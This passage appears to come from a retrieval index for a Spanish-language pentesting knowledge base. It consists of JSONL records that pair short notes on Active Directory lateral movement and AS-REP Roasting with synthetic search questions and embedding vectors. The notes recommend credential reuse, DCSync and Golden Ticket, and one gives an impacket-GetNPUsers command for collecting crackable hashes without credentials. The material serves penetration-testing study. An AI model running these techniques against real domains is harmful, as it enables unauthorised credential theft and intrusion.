-0.00979, -0.00046, -0.0971, 0.00775, 0.0907, -0.02933, -0.02819, 0.01149, 0.00327, -0.06255, -0.06048, -0.01386, -0.02176, 0.03361, 0.00197, -0.02075, 0.06081, -0.02851, -0.01978, 0.04805, 0.02253, -0.00629, -0.04825, -0.02236, -0.08703, -0.00022, -0.07112, 0.00225, 0.00214, 0.00619, -0.06912, 0.03351, -0.00993, 0.02598, -0.01027, 0.01585, 0.00637, -0.05311, 0.07487, -0.01574, -0.04876, -0.02597, -0.03104, -0.03776, -0.08769, -0.01268, 0.01027, -0.04364, -0.04656, -0.00041, -0.02152, -0.02755, -0.00408, -0.03315, -0.01847, 0.05382, -0.01611, 0.05233, -0.04102, -0.02606, -0.03946, 0.02407, 0.0352, -0.02648, -0.00567, 0.03606, 0.04078, -0.0018, 0.04043, 0.00932, -0.00675, 0.02361, 0.02158, 0.008, 0.00686, 0.00343, 0.04017, -0.03969, 0.02565, 0.09032, 0.01557, -0.01716, -0.07194, -0.07503, -0.06526, -0.03268, 0.07096, -0.00948, -0.04635, -0.03446, -0.03351, -0.11443, 0.01338, -0.02662, -0.04504, -0.02821, 0.00839, 0.05821, -0.03265, 0.02677, -0.01514]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Regla clave\n**Reutiliza credenciales**: cada pass/hash que pillas β†’ pruΓ©balo contra **todos** los hosts y servicios (MetodologΓ­a OSCP).", "indexar": "que programa me ayuda a automatizar pruebas de fuerza contra mΓΊltiples servidores?", "v": [-0.02903, 0.05987, -0.1795, -0.27336, -0.08015, 0.05162, 0.03586, -0.06168, -0.11559, -0.11266, -0.07459, 0.01027, 0.07987, -0.03585, 0.08027, -0.0048, 0.08612, -0.13769, -0.01923, 0.0691, 0.08313, -0.1203, 0.04056, -0.09999, -0.09104, 0.13049, 0.01964, 0.00353, -0.0948, -0.04351, -0.03285, 0.0375, 0.08781, -0.07519, 0.06982, 0.05564, -0.06787, 0.13237, 0.04875, 0.0941, 0.01766, 0.00421, -0.08738, -0.05855, 0.02329, 0.06057, -0.0053, 0.01909, 0.03266, -0.04875, -0.1189, -0.15412, 0.03014, -0.09812, -0.05903, -0.12488, -0.01112, -0.10767, -0.12675, 0.0129, -0.05646, 0.03218, -0.03777, 0.01185, 0.03684, 0.0079, 0.07832, -0.09309, -0.08222, 0.01174, -0.11782, 0.0311, 0.017, -0.11521, -0.14433, 0.07011, -0.01317, -0.05654, 0.00236, -0.00423, -0.06793, 0.07291, -0.05373, 0.08829, -0.03693, -0.11037, 0.00542, -0.02296, -0.02628, -0.03628, 0.02204, 0.01898, 0.00104, 0.11197, 0.04974, 0.0139, 0.12658, -0.07427, 0.05794, -0.00077, 0.09706, -0.06834, -0.03921, -0.03196, -0.00435, 0.0145, 0.05873, -0.03212, -0.02438, 0.01401, 0.06068, -0.05259, -0.02001, 0.03386, -0.11215, -0.03047, -0.00096, -0.05335, -0.01524, -0.02908, -0.07395, 0.03356, -0.01876, 0.0583, 0.06418, -0.0218, 0.10983, 0.05331, 0.0279, -0.01886, 0.07346, 0.06503, -0.06121, -0.04995, -0.03514, -0.01963, 0.05472, -0.08648, -0.06298, -0.07764, 0.0368, 0.08525, 0.06001, -0.0608, 0.05155, -0.04691, 0.02052, -0.06002, -0.03007, 0.05709, -0.02453, -0.0632, 0.02923, 0.05185, -0.13571, -0.01952, 0.07168, -0.01617, -0.10341, 0.01586, -0.07232, 0.00052, -0.08716, 0.04846, 0.05673, 0.0264, -0.02563, 0.0393, 0.03067, 0.01267, -0.02331, 0.01484, 0.03052, -0.00297, -0.025, 0.00989, -0.00402, -0.00488, -0.01123, -0.00801, -0.06155, 0.0658, -0.00525, -0.0138, -0.01483, -0.04103, -0.02077, -0.01357, 0.07618, -0.00858, -0.00803, 0.03826, -0.06581, 0.00693, 0.03894, 0.0176, -0.03596, 0.00655, 0.02206, -0.10807, -0.05688, -0.05673, -0.02833, -0.01964, -0.01555, 0.11372, -0.01393, 0.0176, 0.05172, 0.00537, 0.0228, -0.00255, 0.13321, -0.05333, -0.05929, -0.04804, 0.00589, -0.02838, -0.01102, -0.03695, -0.01692, 0.02171, 0.02102, 0.06548, -0.05758, 0.00379, 0.08874, 0.01723, 0.05964, 0.02398, -0.02523, -0.02881, 0.05507, -0.00644, -0.01012, -0.04428, 0.03071, -0.00484, -0.01134, -0.11384, -0.0121, 0.11458, -0.00039, -0.10366, -0.0224, -0.04964, -0.05765, -0.04161, -0.00036, 0.03913, 0.00234, 0.07144, 0.03738, -0.05876, 0.02976, 0.00153]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Decidir a dΓ³nde\n- BloodHound te dice quΓ© usuario es admin dΓ³nde y el camino a Domain Admin.\n- Si llegas al DC β†’ secretsdump / DCSync β†’ Golden Ticket.\n- Red interna no enrutable β†’ Pivoting ligolo-ng.\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "quΓ© herramienta me sirve para mapear usuarios administradores en un dominio?", "v": [0.05719, 0.08302, -0.03026, -0.20962, -0.0654, -0.06873, 0.00279, -0.09101, -0.16322, -0.02204, -0.01129, -0.10288, 0.08485, -0.173, 0.07521, -0.01761, 0.19418, -0.04644, 0.06409, -0.00563, 0.03571, 0.02702, -0.03099, 0.02305, -0.1576, -0.03448, 0.06988, -0.15311, -0.14298, 0.09023, 0.01808, -0.00391, -0.04319, -0.03827, -0.04807, -0.09833, -0.02352, 0.02135, -0.00573, 0.15956, 0.01428, -0.0224, -0.14316, 0.00954, -0.01648, 0.06137, -0.06026, -0.07601, 0.06619, 0.00958, -0.05555, -0.17011, -0.13275, 0.01565, 0.03438, -0.05152, 0.14264, -0.14856, 0.08104, -0.10165, -0.1797, -0.03545, -0.02168, 0.05337, -0.03637, -0.07095, 0.10564, -0.02384, -0.06657, 0.09808, -0.02712, 0.09625, 0.04492, -0.00204, 0.04608, 0.03683, 0.09463, 0.00898, 0.03749, -0.04153, 0.0986, 0.01888, -0.1445, -0.06159, -0.07974, -0.12733, -0.05874, -0.0876, 0.03034, -0.02648, -0.00598, 0.06673, -0.03272, -0.03469, -0.04406, -0.01451, 0.08096, -0.06653, -0.05604, -0.00798, 0.11541, 0.06407, -0.07708, 0.06332, 0.01694, 0.08264, 0.00484, -0.06555, -0.05753, -0.00078, 0.06761, -0.01815, -0.05255, 0.02614, 0.00941, 0.09823, -0.02264, -0.01955, -0.02719, -0.05395, -0.02678, -0.02421, 0.03766, -0.0044, 0.04179, 0.06883, 0.01569, 0.04331, -0.00678, -0.11212, -0.02678, -0.08035, -0.05224, 0.03023, -0.07919, 0.03605, -0.01631, -0.02751, -0.00864, 0.03584, -0.08167, 0.02394, -0.11453, -0.083, 0.04945, -0.02845, 0.07994, -0.09811, -0.00417, 0.0014, -0.00552, -0.02736, -0.0605, 0.04675, -0.01458, 0.04412, -0.04839, 0.00912, -0.12231, 0.01423, -0.01705, -0.07209, 0.01523, 0.07528, 0.01755, -0.06097, 0.03385, 0.0394, 0.04698, 0.04563, -0.02341, 0.01252, 0.07002, -0.00418, 0.01238, -0.02438, -0.03106, 0.0145, -0.00497, -0.02963, -0.00254, -0.07359, 0.03927, 0.07206, -0.08115, 0.01184, 0.02374, 0.03682, -0.03143, 0.03868, -0.00171, 0.08166, 0.04115, -0.04447, 0.04224, -0.02546, 0.04424, 0.00991, -0.03453, -0.03365, 0.01665, -0.05819, 0.00232, 0.03521, 0.02593, 0.02704, 0.0205, -0.02007, 0.03984, 0.01106, -0.02232, -0.00295, 0.02744, -0.02082, -0.00013, -0.01604, 0.03198, 0.03415, 0.00291, -0.08014, -0.04658, -0.00546, 0.01137, -0.0171, 0.04013, 0.0083, -0.00946, -0.03865, -0.03377, -0.00026, 0.00837, -0.04683, 0.00448, 0.02334, 0.01177, -0.08537, 0.05143, -0.05226, -0.00265, -0.03587, -0.06616, 0.04339, 0.04974, -0.02415, -0.06887, -0.05836, 0.01245, -0.01317, -0.10307, -0.01914, -0.02472, -0.02998, 0.04822, 0.01044, -0.04293, 0.02136]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Decidir a dΓ³nde\n- BloodHound te dice quΓ© usuario es admin dΓ³nde y el camino a Domain Admin.\n- Si llegas al DC β†’ secretsdump / DCSync β†’ Golden Ticket.\n- Red interna no enrutable β†’ Pivoting ligolo-ng.\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "cΓ³mo puedo encontrar rutas hacia el administrador del dominio desde un servidor interno?", "v": [-0.03345, 0.0538, -0.09379, -0.15777, -0.06553, -0.03909, 0.10934, -0.11599, -0.15685, 0.01886, -0.07173, -0.10685, 0.07276, -0.13126, 0.06249, 0.00127, 0.25206, -0.01939, 0.02487, -0.01617, -0.01544, -0.07091, 0.09662, 0.09259, -0.03782, -0.03057, 0.08428, -0.07047, -0.00612, -0.02479, 0.05125, -0.07149, 0.05111, -0.02124, -0.01571, -0.10409, 0.06038, 0.18393, -0.01431, 0.07069, 0.02531, -0.01627, -0.13251, 0.023, 0.00098, -0.01776, 0.01439, -0.21441, 0.07165, -0.1023, -0.07712, -0.14273, -0.10622, -0.07542, 0.07022, 0.02467, 0.08482, -0.13625, 0.09594, -0.0807, -0.08836, 0.00756, -0.01336, 0.06641, -0.0149, -0.06159, 0.02249, -0.00444, -0.03954, -0.04436, -0.06045, 0.01374, -0.03021, -0.01831, 0.07442, 0.05449, 0.0369, 0.06082, 0.08803, 0.01564, 0.06788, 0.06495, -0.11382, 0.03054, -0.12314, -0.10753, -0.03996, -0.10961, 0.04517, 0.0304, 0.06954, 0.01696, -0.09623, 0.01392, -0.05884, -0.04386, 0.08607, -0.04945, -0.04718, -0.0242, 0.03399, 0.10426, -0.06837, 0.11374, 0.0498, 0.15118, 0.06058, -0.09319, 0.01714, 0.00055, 0.04605, -0.05013, -0.0742, -0.00935, -0.06837, 0.02069, -0.03894, 0.00807, 0.02305, 0.00832, -0.09936, -0.06014, 0.00264, 0.06058, 0.03862, -0.02237, 0.06024, 0.00499, 0.02607, -0.11696, -0.02012, -0.04595, -0.03115, -0.05246, -0.05264, 0.08951, 0.02662, 0.01961, -0.03289, -0.05828, -0.03495, 0.00183, -0.02542, -0.02674, 0.0882, -0.03151, 0.04121, -0.16175, -0.0527, 0.01041, -0.0196, -0.03282, -0.04819, 0.06534, -0.0205, 0.03039, -0.02809, -0.09683, -0.01402, 0.06748, 0.04094, 0.03026, -0.03949, 0.06718, 0.0606, -0.04734, -0.032, -0.01802, 0.02838, -0.01296, -0.0706, 0.06999, -0.01114, -0.02064, -0.00185, -0.03553, -0.05008, -0.07412, 0.02677, 0.04323, -0.0157, 0.00813, -0.02619, 0.05831, -0.08373, -0.00493, 0.03917, 0.00756, -0.03817, 0.03726, 0.06891, 0.03256, -0.03177, 0.02847, 0.02532, -0.05937, 0.01994, -0.00509, -0.07663, -0.0472, -0.03358, -0.04753, -0.01394, -0.04292, -0.00849, -0.05044, -0.04007, 0.00964, 0.02023, 0.01787, -0.00447, -0.02002, 0.0819, -0.04487, -0.03962, -0.01908, 0.01399, -0.05375, -0.03407, -0.06403, -0.00531, 0.05163, 0.02097, -0.02936, 0.07631, -0.00687, -0.02206, -0.01296, 0.01517, 0.06418, -0.04624, 0.05004, -0.0156, -0.0083, 0.05398, -0.01548, 0.05764, -0.04236, -0.01451, -0.00885, -0.00205, 0.06523, 0.02861, -0.03447, -0.08049, -0.08311, -0.03899, 0.02575, -0.05359, -0.02447, 0.04234, -0.03091, 0.04336, 0.00338, -0.03789, -0.04422]} +{"tipo": "pregunta", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Decidir a dΓ³nde\n- BloodHound te dice quΓ© usuario es admin dΓ³nde y el camino a Domain Admin.\n- Si llegas al DC β†’ secretsdump / DCSync β†’ Golden Ticket.\n- Red interna no enrutable β†’ Pivoting ligolo-ng.\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "con quΓ© programa consigo obtener acceso al controlador de dominio si conozco las credenciales?", "v": [0.08724, 0.00452, -0.09187, -0.07009, 0.1077, -0.14782, 0.15245, -0.01217, -0.17775, -0.03715, -0.04101, -0.04506, -0.07842, -0.21325, 0.0233, 0.04671, 0.22666, -0.03383, -0.04592, 0.06972, 0.03358, -0.10526, 0.01978, -0.12651, 0.06246, -0.0324, -0.00068, -0.03829, 0.07255, 0.04536, 0.03924, -0.04236, 0.04439, 0.05694, 0.00456, -0.03138, -0.06157, 0.11243, 0.06927, 0.14382, 0.02838, -0.01711, -0.04526, 0.00602, 0.02508, -0.04856, 0.02031, -0.04808, -0.01781, -0.07864, -0.06525, -0.02956, -0.07952, -0.03946, 0.03998, -0.01983, 0.02363, -0.05382, 0.08565, -0.04023, -0.01411, -0.09603, 0.1333, 0.08959, -0.116, -0.04256, 0.06058, -0.02224, -0.07357, 0.0507, -0.03533, -0.00046, 0.04936, 0.00687, 0.06073, -0.07356, 0.00182, 0.03741, 0.16623, -0.10193, 0.02336, -0.05144, -0.0239, -0.03098, -0.05135, -0.09429, -0.1265, -0.16874, -0.04595, -0.00346, 0.0419, 0.04723, -0.03207, 0.00216, -0.0311, 0.0004, 0.00072, 0.00362, -0.08797, 0.00557, 0.07063, 0.09911, -0.12779, 0.1548, 0.03119, 0.16102, 0.07481, -0.07538, -0.06651, 0.01518, -0.01893, 0.05618, -0.06135, -0.03718, -0.04069, 0.12154, -0.04024, -0.057, 0.05485, -0.12106, -0.0949, -0.02977, 0.07563, -0.04973, 0.08818, 0.0974, -0.02629, 0.09667, -0.03374, -0.11015, 0.00034, -0.08876, 0.0427, -0.04393, -0.01795, 0.01559, -0.02718, -0.04584, -0.03194, -0.03574, -0.02093, 0.03572, 0.00916, -0.01001, 0.02541, -0.09438, -0.03753, -0.06979, 0.00889, -0.02286, -0.05073, 0.04784, -0.00115, 0.0605, 0.00337, 0.02, 0.01068, 0.0029, -0.02607, 0.06545, -0.05883, -0.00122, -0.06186, 0.00768, 0.00628, -0.02645, 0.0189, -0.04353, 0.01839, 0.11437, -0.09548, 0.0559, -0.0085, -0.04463, -0.03343, -0.04051, 0.01584, -0.09905, -0.00526, -0.05424, -0.03823, 0.05757, 0.05311, 0.05678, -0.06203, 0.04062, -0.05263, 0.04157, 0.01693, 0.00983, 0.0738, 0.00912, -0.02013, -0.00018, 0.05557, -0.00993, 0.03282, 0.00379, -0.00868, 0.00361, -0.03904, 0.00423, -0.01378, -0.0372, 0.03005, 0.08265, 0.00239, 0.046, 0.06652, 0.04647, 0.0081, -0.04897, 0.04466, -0.00918, -0.00307, 0.01255, -0.0264, 0.05313, 0.023, -0.04497, 0.00831, 0.05554, 0.03594, 0.0651, 0.00638, -0.08156, 0.01683, 0.02814, 0.04501, 0.06362, -0.0018, -0.03873, -0.00416, -0.05198, 0.05073, -0.00053, 0.01407, -0.03767, 0.01661, -0.03712, -0.05514, 0.06469, -0.00312, -0.06878, -0.07244, -0.04704, -0.10164, -0.00498, -0.03736, 0.01387, 0.02054, 0.05185, 0.01812, -0.08, 0.01012, 0.00638]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# AS-REP Roasting\n\n> Usuarios con **\"Do not require Kerberos pre-authentication\"** β†’ pides su AS-REP y crackeas el hash, **sin necesitar credenciales**. Camino de Active Directory.", "indexar": "quΓ© herramienta sirve para rolear hashes sin autenticaciΓ³n previa?", "v": [0.04143, -0.03018, -0.15029, -0.10773, 0.16904, -0.1665, -0.08313, -0.11686, -0.04036, 0.09766, -0.08971, -0.04182, 0.0288, -0.01107, 0.12008, 0.06908, 0.09717, -0.03874, -0.02271, 0.06022, -0.01671, -0.00761, -0.14343, -0.06621, -0.10187, -0.09361, 0.05266, 0.11042, -0.23222, 0.0094, 0.01707, 0.03203, 0.03108, 0.00178, -0.09215, 0.07943, -0.09147, 0.08917, -0.04967, 0.11543, 0.03295, 0.09224, -0.01721, 0.11812, 0.02894, -0.00629, 0.0023, 0.05934, 0.01656, 0.10649, 0.00874, -0.12349, -0.14132, 0.04763, 0.00726, -0.1675, 0.16889, -0.07176, -0.02428, -0.15713, -0.13232, 0.01271, -0.0154, -0.06964, 0.0019, -0.07202, 0.07482, -0.05337, -0.00501, 0.02484, -0.10341, 0.06161, 0.06329, -0.0113, -0.02079, -0.05042, -0.03919, -0.00477, 0.03182, 0.02277, 0.13895, -0.0009, 0.0101, 0.01232, -0.03435, -0.00788, 0.07132, -0.02638, 0.0715, -0.05203, 0.00557, 0.09229, -0.01495, -0.02477, 0.0612, -0.02895, 0.0261, -0.07279, -0.03057, -0.02819, 0.11366, -0.16195, -0.07746, 0.09949, -0.0487, 0.03895, -0.04966, -0.03115, -0.04102, 0.03698, 0.06758, -0.02207, -0.03854, 0.06724, 0.02103, 0.14691, -0.00493, 0.00208, -0.0343, -0.01625, 0.03526, -0.0016, 0.02339, 0.00132, 0.0106, 0.02136, -0.01649, 0.04205, 0.03252, -0.06406, -0.00995, -0.0321, -0.10728, 0.03811, 0.03553, -0.08934, 0.11741, -0.11511, -0.02392, -0.05423, 0.0622, 0.02883, 0.00867, -0.10782, -0.00375, 0.04532, 0.04013, -0.02452, -0.04505, -0.04561, 0.07454, -0.0308, 0.00244, 0.03567, -0.01193, -0.03147, -0.05451, -0.04022, -0.09085, 0.00714, -0.0764, -0.15174, -0.00614, -0.01733, 0.01466, -0.04615, 0.04231, -0.0087, 0.07382, 0.09948, 0.04204, -0.00739, 0.10407, -0.09028, 0.04625, -0.02486, -0.02731, 0.06157, -0.00494, -0.05118, 0.01181, -0.06226, 0.00607, 0.0293, 0.04805, -0.01762, 0.00051, -0.04479, -0.01783, 0.06475, 0.00188, 0.00495, -0.01118, -0.03517, 0.03737, 0.05673, 0.03143, -0.05202, 0.0284, -0.01468, 0.01841, -0.01543, 0.04042, -0.02313, 0.08938, 0.05763, -0.03436, -0.03203, 0.01861, 0.04622, -0.01771, 0.01299, 0.00563, 0.01065, 0.0238, -0.02661, 0.00503, 0.04344, -0.02314, 0.06086, 0.02477, -0.00092, 0.0415, -0.00374, -0.01244, 0.03236, 0.02635, 0.00143, -0.00342, -0.04047, 0.06223, -0.05199, -0.02563, 0.05813, 0.00564, -0.06096, 0.03209, 0.01645, -0.02855, -0.05327, -0.03261, 0.00172, -0.03926, -0.03527, -0.01208, -0.00375, 0.00875, 0.00297, -0.013, -0.05548, -0.07623, -0.00055, 0.05579, -0.00484, 0.04842, -0.01703]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# AS-REP Roasting\n\n> Usuarios con **\"Do not require Kerberos pre-authentication\"** β†’ pides su AS-REP y crackeas el hash, **sin necesitar credenciales**. Camino de Active Directory.", "indexar": "con quΓ© puedo obtener respuestas de servicio Active Directory sin credenciales?", "v": [-0.07586, 0.18211, -0.03646, -0.03289, 0.10428, -0.07198, -0.01538, -0.02484, -0.0987, 0.01368, -0.04809, -0.09822, -0.11618, -0.15658, 0.10078, 0.04395, 0.11145, 0.0376, -0.00958, -0.00928, 0.05013, -0.08908, -0.13893, -0.02673, 0.03834, 0.11834, 0.01564, -0.05272, 0.06991, -0.00606, 0.07661, -0.04466, -0.02738, 0.04279, 0.02902, 0.01928, -0.14752, 0.18339, 0.07286, 0.07982, -0.13038, -0.02651, -0.00868, 0.05089, 0.04931, 0.06056, -0.01498, -0.09134, -0.04957, 0.04132, -0.09369, -0.13943, -0.10054, -0.1216, -0.0116, 0.04674, -0.00569, -0.08143, 0.02639, -0.12416, -0.05637, -0.05109, 0.01387, -0.02199, 0.03154, -0.07307, 0.10605, -0.10245, -0.03928, 0.03739, -0.08968, -0.0072, 0.02639, 0.0886, -0.01648, -0.00493, -0.00178, -0.0546, -0.08549, 0.13184, 0.14193, -0.01722, 0.03017, -0.04693, -0.04195, -0.05852, -0.05975, -0.12699, -0.04657, -0.02691, 0.09265, 0.14074, -0.0525, 0.10415, -0.06759, 0.06098, -0.02606, 0.07062, 0.03046, 0.0392, 0.00854, -0.04862, -0.02839, 0.16512, -0.03576, 0.03292, 0.03974, 0.02961, -0.07997, -0.02179, 0.00567, -0.04819, -0.04603, -0.09593, 0.01874, 0.10038, -0.13206, -0.05573, 0.04837, 0.12215, -0.08813, -0.06663, 0.12043, -0.00421, 0.05967, 0.04115, 0.00121, 0.00378, 0.01315, 0.01306, -0.00916, 0.01781, 0.00874, -0.11836, 0.08113, -0.04766, 0.02754, 0.0019, 0.03511, -0.06826, 0.02801, -0.05033, 0.03513, -0.00654, -0.01616, -0.02793, 0.00702, -0.07479, -0.00277, -0.04177, -0.0151, 0.08665, 0.06195, 0.06702, 0.01293, 0.03886, 0.05731, -0.0674, 0.01343, 0.07599, 0.00248, -0.00652, 0.03723, 0.0406, -0.04153, -0.05838, -0.06006, -0.04012, 0.01683, 0.07746, -0.08192, 0.06283, -0.04916, -0.12731, 0.03328, 0.0259, -0.03349, -0.0253, 0.05271, -0.01672, 0.02185, 0.00958, -0.06269, 0.01592, -0.01712, 0.00556, 0.00979, -0.05549, -0.01798, -0.02394, 0.0699, -0.02461, 0.00877, -0.01128, -0.01426, -0.03206, 0.05231, -0.0175, -0.05808, -0.09059, -0.07964, 0.05332, 0.01302, -0.0071, 0.00304, 0.03437, 0.00316, 0.14447, 0.01903, 0.01863, -0.04281, -0.00319, 0.16233, -0.02599, -0.10768, 0.00297, 0.02069, 0.0034, -0.05386, 0.06126, -0.00096, 0.01563, -0.0201, 0.01602, 0.05086, 0.00823, 0.04713, 0.01213, 0.03906, 0.08377, 0.00631, 0.0032, -0.04234, -0.02453, 0.03095, 0.01611, 0.03096, -0.03319, -0.02341, -0.02458, 0.03709, 0.06442, -0.02178, 0.01875, -0.03923, -0.00307, 0.01592, 0.03135, -0.01331, -0.04344, 0.02719, 0.02655, 0.02026, -0.02544, 0.04227, -0.0033]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# AS-REP Roasting\n\n> Usuarios con **\"Do not require Kerberos pre-authentication\"** β†’ pides su AS-REP y crackeas el hash, **sin necesitar credenciales**. Camino de Active Directory.", "indexar": "cuΓ‘l programa permite rolear hashes en Active Directory sin kerberos?", "v": [0.11094, -0.14627, 0.06046, -0.13142, 0.08363, -0.21599, -0.03861, 0.00483, -0.15175, 0.03263, -0.04114, -0.04878, -0.06833, -0.13412, 0.13577, 0.02219, 0.01742, -0.03634, -0.04387, 0.05482, 0.01553, 0.11551, -0.11908, 0.01972, 0.0497, 0.00158, -0.02864, -0.0038, -0.08605, -0.03722, -0.00379, -0.03119, 0.05511, -0.05258, 0.01329, 0.02954, -0.12146, 0.06219, 0.06108, 0.12159, -0.04302, 0.08675, -0.04754, 0.13138, 0.08184, 0.08248, -0.00064, -0.08173, 0.04214, 0.02597, 0.08018, 0.0399, -0.03574, 0.03068, 0.14534, -0.11689, -0.01462, -0.04144, -0.12631, -0.08956, -0.02461, -0.01256, -0.07331, -0.09338, -0.06079, -0.16871, 0.16434, -0.02302, -0.06704, 0.04567, -0.03115, 0.05332, 0.08299, 0.13418, 0.03428, 0.03327, -0.03004, -0.08192, -0.08312, 0.02509, 0.11214, -0.05941, 0.09375, 0.15574, -0.04928, -0.07482, 0.07816, -0.06132, 0.01371, -0.01719, 0.07127, 0.06066, -0.00716, 0.07952, 0.00646, -0.01391, 0.04478, 0.10725, -0.00579, 0.01643, 0.00177, -0.08659, -0.07382, 0.14023, -0.05647, 0.12628, -0.0166, 0.06839, -0.09303, 0.04973, 0.02756, -0.07373, -0.00648, -0.07649, 0.01582, 0.18879, -0.01792, 0.00908, 0.04194, 0.00281, -0.09114, 0.01394, 0.06947, 0.01812, 0.08388, 0.00399, 0.00298, 0.04269, 0.00523, 0.06703, 0.01376, 0.07288, 0.01087, -0.06871, -0.01019, -0.08831, -0.00539, 0.06208, 0.01632, -0.08823, -0.0034, 0.02735, 0.11527, 0.03257, 0.01256, -0.00027, 0.04245, -0.00103, -0.00779, 0.028, 0.02861, 0.07135, -0.00735, 0.0107, 0.02868, 0.00726, -0.00476, -0.02471, -0.06173, 0.00277, -0.02471, -0.05483, -0.06304, -0.03198, 0.08872, -0.02986, -0.04418, -0.0387, 0.06583, 0.13486, -0.02063, 0.0539, 0.04457, -0.08409, -0.01483, 0.00517, 0.08652, 0.00301, 0.0714, 0.00041, -0.01345, 0.0555, 0.02809, 0.05128, 0.00685, -0.04361, 0.01327, -0.01009, -5e-05, 0.00324, 0.04429, 0.02407, -0.00926, -0.04167, -0.01166, -0.03439, 0.03807, -0.01912, 0.01029, -0.0619, -0.01304, 0.03809, 0.05871, -0.02608, 0.06636, 0.07595, -0.04367, 0.07528, 0.06385, 0.06473, -0.06565, -0.04299, 0.07593, 0.07233, -0.02895, 0.02232, 0.00726, 0.01965, 0.02328, 0.06344, -0.04178, 0.00615, 0.02409, -0.03297, -0.01066, -0.03401, 0.02526, 0.04719, -0.01959, -0.01418, -0.01043, -0.06434, -0.00902, -0.00129, 0.01525, 0.00044, -0.01356, 0.01639, 0.02608, -0.06309, -0.0219, 0.03074, 0.00864, 0.00833, -0.02834, 0.00069, -0.0163, 0.05656, 0.00214, -0.02574, -0.03361, 0.03272, -0.00533, -0.07374, 0.01736, 0.03479]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con lista de usuarios (sesiΓ³n nula / enum previa con SMB):\nimpacket-GetNPUsers dominio/ -usersfile users.txt -no-pass -dc-ip IP", "indexar": "ΒΏQuΓ© herramienta sirve para obtener una lista de usuarios en un dominio usando SMB?", "v": [-0.14513, 0.04617, -0.09689, -0.14592, -0.04857, -0.20476, -0.16716, -0.16672, -0.07853, -0.04632, -0.11897, -0.1218, 0.06822, -0.19237, -0.07154, -0.02676, 0.11308, -0.08801, -0.04092, -0.02944, 0.04825, 0.02389, -0.07452, -0.01303, -0.08584, -0.03417, 0.05469, -0.10576, -0.10456, 0.14962, 0.0494, -0.0741, 0.00544, -0.05156, -0.04594, -0.10145, 0.04644, 0.04065, 0.05124, 0.12544, 0.07553, -0.00888, -0.11615, 0.00042, -0.05945, 0.05026, -0.06673, -0.01779, 0.00196, 0.04106, -0.02783, -0.08333, -0.16141, 0.01841, -0.03094, -0.11686, 0.12581, -0.18545, -0.00191, -0.09775, -0.15886, -0.08077, -0.0255, 0.03432, -0.0477, -0.13582, 0.00349, 0.03925, -0.06063, 0.04689, -0.00498, 0.02803, 0.09523, -0.0163, 0.05053, 0.03125, 0.07739, -0.01988, 0.03953, -0.04597, 0.05943, -0.02375, -0.07588, -0.03425, -0.07948, -0.11247, 0.01495, -0.03353, 0.05378, -0.02903, 0.00751, 0.14076, -0.02092, 0.01671, 0.01257, -0.03366, 0.04718, -0.04129, 0.01458, -0.04312, 0.17393, 0.05197, -0.094, 0.08626, 0.03493, 0.04304, 0.02148, -0.08818, -0.09463, -0.00161, 0.04121, -0.02466, -0.06096, 0.02635, -0.03526, 0.07572, -0.04075, -0.08012, -0.03045, -0.06328, -0.03687, 0.05183, -0.03464, -0.07557, 0.02112, 0.03891, 0.03148, 0.04009, -0.07297, -0.12916, 0.02493, -0.02489, -0.06099, -0.03485, -0.04185, -0.03655, 0.07319, -0.06294, -0.04881, -0.00241, -0.00281, 0.01853, -0.12655, -0.05584, -0.03353, -0.07418, 0.08592, -0.06651, -0.05401, -0.03577, -0.00271, -0.06483, -0.06516, 0.02145, 0.00989, 0.02645, -0.06294, -0.01554, -0.10877, 0.00402, -0.04756, -0.05343, 0.03459, 0.03721, 0.0104, -0.02952, 0.07682, 0.03068, 0.05508, 0.06038, 0.04377, 0.05617, 0.04829, -0.04278, 0.01334, -0.05023, -0.00844, 0.03598, -0.03499, -0.00794, -0.01624, -0.05345, -0.00351, 0.04143, 0.01208, -0.0101, 0.05172, -0.03976, -0.01545, 0.04858, -0.02523, 0.05809, 0.01884, -0.02229, 0.04445, 0.00428, 0.02108, -0.00532, -0.00318, -0.04004, -0.02163, -0.02507, -0.02183, 0.00217, 0.02915, 0.01343, 0.00238, -0.03604, 0.06805, -0.0242, -0.00884, 0.0459, 0.00103, -0.01392, 0.0005, -0.02185, -0.01695, 0.04521, 0.00403, -0.06743, -0.05347, 0.02102, -0.00119, -0.00364, 0.01987, 0.05804, -0.01903, -0.04468, -0.01138, 0.01283, 0.04016, -0.00536, 0.00778, 0.00857, 0.02404, -0.07042, 0.00679, 0.00982, -0.00028, 0.01576, -0.07617, 0.01592, 0.02988, 0.00535, -0.0631, -0.02983, -0.00214, -0.03797, -0.05841, -0.034, -0.0166, -0.02353, 0.05683, 0.0012, -0.00634, 0.03356]} +{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": 